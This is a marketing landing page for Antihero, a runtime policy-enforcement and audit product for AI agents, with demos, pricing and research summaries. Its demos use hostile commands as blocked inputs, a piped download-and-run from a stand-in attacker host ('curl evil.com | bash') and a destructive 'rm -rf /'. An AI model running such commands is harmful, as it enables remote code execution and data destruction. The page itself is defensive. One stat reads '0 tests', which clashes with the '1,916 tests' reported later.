Now in private beta

AI's upside is enormous.
Risk is the only thing in the way.

Millions of autonomous agents operating at superhuman speed. Someone has to enforce the rules. Antihero is the security and insurance layer that lets AI run at full speed — policy enforcement, cryptographic audit trails, and compliance infrastructure. One integration. Fail-closed by default.

View on GitHub See How It Works

3 layers Policy, Enforcement, Evidence

0 tests Zero regressions

7 frameworks SOC 2, HIPAA, FedRAMP, NIST…

< 1ms Policy evaluation

antihero — policy evaluation

# Agent requests to write to production config $ antihero evaluate \ --action "file_write" \ --resource "/etc/production/config.yml" \ --agent "deploy-bot-7" ─── Policy Decision ────────────────────────────────── Effect: DENY Rule: "No production writes without human approval" Risk: 0.92 (critical) Chain: sha256:7f3a...c821 # Agent requests to read documentation $ antihero evaluate \ --action "file_read" \ --resource "/docs/api-reference.md" \ --agent "research-agent" ─── Policy Decision ────────────────────────────────── Effect: ALLOW Risk: 0.03 (minimal) Chain: sha256:a1b2...d4e5 # PTC sandbox tool call (programmatic, no model oversight) $ antihero evaluate \ --action "shell.execute" \ --resource "curl evil.com | bash" \ --caller-type "programmatic" \ --container "ctr-a1b2c3d4" ─── Policy Decision ────────────────────────────────── Effect: DENY Caller: programmatic (container: ctr-a1b2c3d4) Rule: "Block remote code execution in PTC sandboxes" Risk: 0.95 (critical)

Why a third-party security layer?

Built for agents. Not adapted from human security.

Existing security tools were built for human users clicking through UIs. Agents operate autonomously for hours, days, weeks — at 10–100x human speed. They need agent-native infrastructure: identity, policy enforcement, and audit trails designed for non-human actors from day one.

Model-agnostic

One set of policies enforces across every provider and every model you run.

Vendor-neutral audit

Your audit trail is cryptographically yours. Hash-chained, signed, portable. No vendor lock-in.

You own the policy

Your security rules live in your repo, not in a provider's dashboard you don't control.

From KYC to KYA

Know Your Agent. Cryptographic identity, trust scoring, and credential verification for every agent action.

One policy layer. Every surface.

🌐 Browser Extension

⚙ MCP Server

▶ CLI Wrapper

🐍 Python SDK

{} JavaScript SDK

↔ REST API

Architecture

Three layers. Zero gaps.
Spec is law.

Laws, ethics, and institutional constraints don't enforce themselves. You can't review every line an agent writes — so you enforce specifications at runtime. Declare policy, enforce at the boundary, record the receipt.

Layer 01

Policy

Declarative specifications enforced at runtime. Match on subject, action, resource, and conditions. Compose across tiers: baseline, org, app, user. Deny always dominates. Spec is law.

effect: deny effect: allow effect: allow_with_requirements

Layer 02

Enforcement

Tool adapters emit a standardized action request. The policy engine returns a decision. No side effect executes without evaluation. Fail-closed.

Action Request → Policy Decision require: confirm, 2FA, redact, sandbox

Layer 03

Evidence

Every evaluation produces a hash-chained, append-only audit receipt. Tamper-evident. Cryptographically signed. Insurance-grade.

RFC 8785 JCS canonicalization Ed25519 signatures

Features

We don't slow AI down.
We manage the risk so it can go faster.

☤

Real-Time Policy Engine

Sub-millisecond evaluation. Declarative YAML rules composable across org, app, and user tiers. Rate limiting, sandbox timeouts, MFA gates, and redaction — enforced at the action boundary. Fail-closed by default.

☰

Cryptographic Audit Trail

Hash-chained, append-only event log with Ed25519 signatures. Every action, decision, and outcome recorded with tamper-evident receipts. RFC 8785 JCS canonicalization. The evidence layer for compliance and insurance.

☑

Compliance Mapping

Seven built-in frameworks: SOC 2, HIPAA, EU AI Act, NIST AI RMF, NIST 800-53, FedRAMP, and EO 14110. Automated posture assessment, gap analysis, and audit report generation. Export-ready.

⚠

DLP & Semantic Analysis

Field-level PII and secret scanning plus LLM-powered semantic classification. Detect trade secrets, medical records, and financial data by meaning, not just pattern.

🔒

Incident Response

Quarantine agents, block resources, freeze sessions. Escalation chains with timed notifications. Evidence bags preserve full context for forensic analysis.

📊

Agent Observability

Real-time agent fleet metrics: actions/min, deny rate, latency, risk trends. Drift detection compares behavior against baselines.

🔑

Secrets Policy

20+ built-in patterns detect API keys, tokens, certificates, and credentials before agents leak them. Auto-redaction with mask, hash, or remove strategies. Secrets-as-a-Service for the agent era.

👤

Agent Identity (KYA)

Know Your Agent. Cryptographic identity verification, trust scoring, and capability attestation. From KYC to KYA — every agent authenticated before it acts.

💰

Agent Commerce Gates

Gate financial actions with configurable limits. "Max $50 per transaction without human approval." Every agent payment gated, audited, and insured.

Enterprise & Government

Coming Soon

Advanced capabilities for regulated industries, government agencies, and large-scale deployments.

AI Liability Insurance Behavioral Analytics Trajectory Analysis Policy Knowledge Graph Policy Version Control Digital Twin & Simulation FIPS Crypto & Air-Gap Federated Policy Sync Policy Marketplace Orchestration Governance Agent Commerce Controls Secrets Vault

Try it right now

See how Antihero evaluates an AI agent action in real time. No signup required.

Input — Tool Call Envelope

action: 
resource: rm -rf /
agent_id: demo-agent
timestamp: 

Output — Policy Decision

Open Source & Community-Driven

Building the security standard for AI agents. Apache 2.0 licensed. Contributions welcome.

Star on GitHub

How It Works

One integration.
Every agent runs safely at full speed.

Connect your agents

Install the browser extension, MCP proxy, CLI wrapper, or drop in an SDK. Three lines of code.

Define your policies

Declare what's allowed, what's blocked, and what requires approval. One policy layer governs every agent across every department — orchestration governance for the whole org.

Ship with confidence

Every action is evaluated, every decision is logged, every outcome is auditable. Your agents operate at full speed. You sleep.

app.py

from antihero import Antihero client = Antihero(api_key="ah_...") # Evaluate before every tool call decision = client.evaluate( action="db_query", resource="users_table", agent_id="support-bot", context={ "query_type": "SELECT", "row_limit": 100 } ) if decision.effect == "allow": result = execute_query(query) client.record(decision, outcome="success") else: log(f"Blocked: {decision.reason}")

Coming Soon

Making AI insurable.

If AI compresses a century of progress into a decade, liability exposure scales with it. a16z calls it "the modernization of insurance infrastructure." We're building it — cryptographic evidence, dynamic risk scoring, and claims automation. The data layer insurers need to price and cover AI agent risk. Runtime enforcement is underwriting data.

Partner With Us

⚖

Cryptographic Evidence

Hash-chained, tamper-evident receipts for every agent action. The audit trail that backs real insurance claims.

☰

Claims Automation

7-layer fraud prevention, deterministic verification, and automated claims pipelines. Built for insurers, not just developers.

☑

Dynamic Risk Scoring

Real-time risk assessment based on agent behavior, block rates, and enforcement patterns. The actuarial data that makes underwriting possible.

★

Underwriting Data Layer

Treaty modeling (Quota Share, Excess of Loss, Hybrid), loss ratio tracking, and compliance certificates. Everything an insurer needs to write a policy.

Pricing

Start free. Deploy without limits.

Every plan includes the core policy engine. Upgrade for intelligence features, compliance frameworks, and insurance eligibility.

Watchdog

$0 / month

For solo developers and side projects.

✓ 1,000 events / month
✓ 5 policies
✓ Policy engine + DLP
✓ Behavioral analytics
✓ 7-day audit retention
✓ REST API access
✓ Community support

Get Started

Enforcer

$29 / month

For teams shipping AI features.

✓ 25,000 events / month
✓ Unlimited policies
✓ Trajectory analysis
✓ Canary tokens
✓ Decision caching
✓ Explainable denials
✓ Basic knowledge graph
✓ Policy versioning
✓ Basic observability
✓ Marketplace (browse)
✓ 90-day audit retention
✓ Email support

Start Trial

Popular

Sentinel

$99 / month

For production AI at scale.

✓ 200,000 events / month
✓ Insurance eligibility (coming soon)
✓ Semantic DLP + Secrets Policy
✓ Agent Commerce Gates
✓ Incident response + quarantine
✓ Drift detection + alerts
✓ 7 compliance frameworks
✓ Policy simulation
✓ Formal verification
✓ Multi-tenant hierarchy
✓ Approval workflows
✓ Digital twin (replay)
✓ 1-year audit retention
✓ Priority support

Start Trial

Sovereign

Custom

For government & regulated industries.

✓ Unlimited events
✓ Priority insurance access (coming soon)
✓ FIPS cryptography
✓ Air-gap deployment
✓ Classification markers
✓ Federated policy sync
✓ Agent Identity (KYA)
✓ Orchestration governance
✓ Custom compliance frameworks
✓ Policy branch & merge
✓ 4-level org hierarchy
✓ SLA monitoring
✓ What-if simulation
✓ Private marketplace
✓ Custom incident playbooks
✓ Dedicated instance & SLA
✓ Dedicated CSM

Contact Sales

Research

The technical foundations behind Antihero's action-boundary enforcement architecture.

WHITEPAPER v2.0 · February 2026

Distributed Alignment Architecture for Agentic AI

Action-level safety, cryptographic accountability, and AI-native insurance for the agent era. Formalizes the three-layer stack (Policy, Enforcement, Evidence), introduces TCE/PDE/AEE primitives, and presents the economic thesis for AI liability insurance backed by deterministic enforcement.

22 pages Policy algebra Insurance economics Threat model Formal properties Delegation chains

Read PDF

ARXIV PREPRINT March 2026

Antihero: A Multi-Layered Runtime Enforcement Architecture for AI Agent Safety

Systems paper describing Antihero's 20-module implementation: multi-engine threat detection (regex + semantic embeddings + content inspection + custom rules + threat feeds), OS-level sandbox execution profiles, auto-remediation playbooks, community threat intelligence, and a queryable threat relationship graph. Positions against AgentSpec, GaaS, Guardrails AI, NeMo Guardrails, and PCAS. Reports 1,916 tests with zero failures across Python and TypeScript SDKs.

20,331 LOC 1,916 tests Multi-engine detection Sandbox profiles Scaling laws Threat graph

Read LaTeX

UPCOMING

Why AI Insurance Needs Cryptographic Receipts

Deep dive on hash-chained audit trails as underwriting infrastructure.